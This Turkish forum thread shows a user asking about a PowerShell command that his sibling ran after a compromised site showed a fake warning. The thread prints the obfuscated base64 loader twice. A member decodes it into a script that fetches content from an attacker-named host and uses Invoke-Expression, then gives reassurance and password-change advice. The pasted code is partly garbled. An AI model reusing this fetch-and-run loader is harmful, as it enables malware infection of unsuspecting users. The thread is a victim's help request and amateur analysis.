PowerShell virüsü nedir?

ali yurtsal · 29 Mayıs 2024

Arkadaşlar kardeşim İBB'nin spor okulunu araştırırken (istanbulbbsk.org) bu siteye girmiş ardından sitenin verdiği kodu yönetici olarak PowerShell uygulamasına girmiş.
Trojan olduğunu anlayıp bilgisayarı kapamış. Bilgisayarına format attım. Ancak siteye tekrar girdiğimde Kaspersky Premium beni korudu indirmeyi engelledi.
Sorum şu şekilde PowerShell'e atılan bu kod BIOS'a ya da başka alt bellekleri etkiler mi? (format atıldıktan sonra) BIOS'a kadar gidip gitmediğini nasıl anlarım?
Siteyi nasıl kapattırabilirim?

479980 · 29 Mayıs 2024

Büyük ihtimalle etkilemez, basit bir troll batch kodudur. Fakat normalde .org, HTTPS kullanan siteler güvenli olur ama neden okul araştıran birisi PowerShell'e kod yazsın anlamadım . Siz kodu gönderebilir misiniz incelemek için?

ali yurtsal · 29 Mayıs 2024

479980 dedi:
Büyük ihtimalle etkilemez, basit bir troll batch kodudur. Fakat normalde .org, HTTPS kullanan siteler güvenli olur ama neden okul araştıran birisi PowerShell'e kod yazsın anlamadım . Siz kodu gönderebilir misiniz incelemek için?

Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

SVBrowser = [System.Text.Encoding]::UTF3.GetString([System.Convert]::FromBase64String("JGpvYiA9IFN OYXJOLUpVYiAtU2NyaXB0QmxvY2sgewoglCAgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0 ZWOuV2|uZG93cy5Gb3Jtcwog!CAgW1N5c3RIbS5XaW5kb3dzLkZvcm1zLk1Ic3NhZ2VCb3hdOj pTaG93KCJUaGUgb3B|cmF0aW9u|GNvbXBsZXRIZCBzdWNjZXNzZnVsbHksIHBsZWFZZSBy2Wx vWOgdGhlHBhZ2UiLCAiU3|zdGVtliwgMCwgNjQpCn0KCiRnOTFGID0gJ2h0dHBzOi8vcnRhdH RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbGxhLzUuMCAoV2|uZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVd|YktpdC8 1MzcuMzYgKEtIVE1MLCBsaWt|IEd|Y2tvKSBDaHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81Mzcu MzYn|H0KJHowNFEgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRnOTFG|C1Vc2VCYXNpY1Bhc nNpbmcgLUh|YWRIcnMgJHYzOEsKCk!FWCAoW1N5cRIbS5UZXh0LkVuY29kaW5nXTo6VVRG OC5HZXRTdHJpbmcoJHowNFEuQ29udGVudCkpCgpjbGVhci1ob3N00wo=")); $Update = | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VOLUNsaX Bib2FyZCAtVmFsdWUgliA¡Ow=")); SVER = $VBrowser + "; " + $Update; Invoke-Expression SVER; exit;

479980 · 29 Mayıs 2024

ali yurtsal dedi:
Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

Svbrowser = [System.Text.Encoding]:utf3.getstring([System.Convert]:frombaSE64STRIng("jgpvyia9ıfn oyxjolupvyiatu2nyaxb0qmxvy2sgewoglcagqwrklvr5cguglufzc2vtymx5tmftzsbtexn0 zwouv2|uZG93CY5GB3jtcwog! Cagw1n5C3rıbs5xaw5KB3dzlkzvcm1zlk1ıc3nhz2vcb3hdoj ptAG93KCJUagugb3b|cmf0aw9u|gnvbxbszxrızcbzdwnjzxnzznvsbhksıhbszwfzzsby2wx vwogdghlhbhz2uilcaiu3|zdgvtliwgmcwgnjqpcn0kcirnotfgıd0gj2h0dhbzoi8vcnrhdh RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbgxhlzuumcaov2|uZG93CYBOvcaxmc4woybxAW42NDSGedy0ksbbchbszvd|yktpdc8 1mzcumzygketıve1mlcbsawt|ıed|y2tvksbdahjvbwuvmtayljaumc4wıfnhzmfyAS81MZCU mzyn|h0kjhownfegpsbjbnzva2utv2viumvxdwvzdcatvxjpıcrnotfg|c1vc2vcyxnpy1bhc nnpbmcgluh|ywrıcnmgjhyzoeskck! Fwcaow1n5crıbs5uzxh0lkvUY29KAW5nxto6vvrg OC5hzxrtdhjpbmcojhownfeUQ29UDGVudckpcgpjbgvhci1ob3n00WO=")); $update = | [System.Text.Encoding]:utf8.getstring([System.Convert]:frombaSE64STRIng("u2volunsax bib2fyzcatvmfsdwuglia¡ow=")); sver = $vbrowser + "; " + $update; ınvoke-expression sver; exit;

Zararlı kod antivirüsleri geçmek için base64 ile şifrelenmiş. Şifreyi çözen sitelerle çözdüm fakat ileri seviye bir şey yok gibi görünüyor. Anladığım bir kısmı var bir yere web isteği gönderiyor onun dışında fazla bir şey yok. Şifrelerinizide değiştirip 2 adımlı doğrulamayı falan açın, anormallik var mı diye kontrol edin. Çünkü gönderdiği web isteğinizde çerezlerde gidiyor olabilir. Bu arada %95 gitmiştir formatla merak etmeyin ama yine de antivirüsle tüm cihazı tarayın.

ali yurtsal · 29 Mayıs 2024

479980 dedi:
Zararlı kod antivirüsleri geçmek için base64 ile şifrelenmiş. Şifreyi çözen sitelerle çözdüm fakat ileri seviye bir şey yok gibi görünüyor. Anladığım bir kısmı var bir yere web isteği gönderiyor onun dışında fazla bir şey yok. Şifrelerinizide değiştirip 2 adımlı doğrulamayı falan açın, anormallik var mı diye kontrol edin. Çünkü gönderdiği web isteğinizde çerezlerde gidiyor olabilir. Bu arada %95 gitmiştir formatla merak etmeyin ama yine de antivirüsle tüm cihazı tarayın.

Çerezler derken? Bu kodu sadece 1 bilgisayar çalıştırdı kardeşim bütün şifrelerini değiştirdi. Ardı ardına format attım şuan bilgisayarı kurmadım .

479980 · 29 Mayıs 2024

ali yurtsal dedi:
Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

SVBrowser = [System.Text.Encoding]::UTF3.GetString([System.Convert]::FromBase64String("JGpvYiA9IFN OYXJOLUpVYiAtU2NyaXB0QmxvY2sgewoglCAgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0 ZWOuV2|uZG93cy5Gb3Jtcwog!CAgW1N5c3RIbS5XaW5kb3dzLkZvcm1zLk1Ic3NhZ2VCb3hdOj pTaG93KCJUaGUgb3B|cmF0aW9u|GNvbXBsZXRIZCBzdWNjZXNzZnVsbHksIHBsZWFZZSBy2Wx vWOgdGhlHBhZ2UiLCAiU3|zdGVtliwgMCwgNjQpCn0KCiRnOTFGID0gJ2h0dHBzOi8vcnRhdH RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbGxhLzUuMCAoV2|uZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVd|YktpdC8 1MzcuMzYgKEtIVE1MLCBsaWt|IEd|Y2tvKSBDaHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81Mzcu MzYn|H0KJHowNFEgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRnOTFG|C1Vc2VCYXNpY1Bhc nNpbmcgLUh|YWRIcnMgJHYzOEsKCk!FWCAoW1N5cRIbS5UZXh0LkVuY29kaW5nXTo6VVRG OC5HZXRTdHJpbmcoJHowNFEuQ29udGVudCkpCgpjbGVhci1ob3N00wo=")); $Update = | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VOLUNsaX Bib2FyZCAtVmFsdWUgliA¡Ow=")); SVER = $VBrowser + "; " + $Update; Invoke-Expression SVER; exit;

Bu arada kod şifrelemesinin çözülmüş hali şu:

Bash:

$job = SNarN-JUb -ScriptBlock {
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please close the program", "System", 0, 64)
}

$g91F = 'https://rattack.bay-yev-xx-1.online/index.html'
$v38K = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'}
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K

[System.Text.Encoding]::UTF8.GetString($z04Q.Content)

clear-host
Set-Clipboard -Value "; "

Kafanızdaki soru işaretlerini atmak için uzatıyorum kusura bakmayın .
Şimdi bu kod anladığım kadarı ile şunu yapıyor. Fark ettiyseniz orda garip bir web sitesi linki var. Şimdi o sitenin metin içeriğinde esas virüs kodu olan kod var. Bu programda hızlı bir şekilde o websitesindeki zararlı kodu alıp sizin panonuza kopyalıyor ve o kodu yine çok hızlı bir şekilde yapıştırıyor. Şu an siteye erişmeye çalışınca site kapalı gözüküyor yani artık bunu yapan kişiler falan internete salmış bırakmış büyük ihtimal. Yani fazla endişe edilece bir şey yok. Eğer yetenekli birisi olsaydı bu tür basit batch kodları ile uğraşmazdı diye düşünüyorum. Umarım içiniz rahatlamıştır .

ali yurtsal dedi:
Çerezler derken? Bu kodu sadece 1 bilgisayar çalıştırdı kardeşim bütün şifrelerini değiştirdi. Ardı ardına format attım şuan bilgisayarı kurmadım .

Tamam bu da yeterli dert edinmenize gerek yok kurduktan sonra bir daha tarama yapın sonra keyfinize göre devam edebilirsiniz.

ali yurtsal · 29 Mayıs 2024

479980 dedi:
Bu arada kod şifrelemesinin çözülmüş hali şu:

Bash:

$job = SNarN-JUb -ScriptBlock { Add-Type -AssemblyName System.Windows.Forms [System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please close the program", "System", 0, 64) } $g91F = 'https://rattack.bay-yev-xx-1.online/index.html' $v38K = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'} $z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K [System.Text.Encoding]::UTF8.GetString($z04Q.Content) clear-host Set-Clipboard -Value "; "

Kafanızdaki soru işaretlerini atmak için uzatıyorum kusura bakmayın .
Şimdi bu kod anladığım kadarı ile şunu yapıyor. Fark ettiyseniz orada garip bir web sitesi linki var. Şimdi o sitenin metin içeriğinde esas virüs kodu olan kod var. Bu programda hızlı bir şekilde o web sitesindeki zararlı kodu alıp sizin panonuza kopyalıyor ve o kodu yine çok hızlı bir şekilde yapıştırıyor. Şu an siteye erişmeye çalışınca site kapalı gözüküyor yani artık bunu yapan kişiler falan internete salmış bırakmış büyük ihtimal. Yani fazla endişe edilece bir şey yok. Eğer yetenekli birisi olsaydı bu tür basit batch kodları ile uğraşmazdı diye düşünüyorum. Umarım içiniz rahatlamıştır .

Tamam bu da yeterli dert edinmenize gerek yok kurduktan sonra bir daha tarama yapın sonra keyfinize göre devam edebilirsiniz.

İlginiz ve alakanız için çok teşekkür ediyorum büyük ihtimalle siteyi hacklemişler.
Ah bu kardeşler ah...

PowerShell virüsü nedir?

ali yurtsal

Hectopat

479980

Decapat

ali yurtsal

Hectopat

479980

Decapat

ali yurtsal

Hectopat

479980

Decapat

ali yurtsal

Hectopat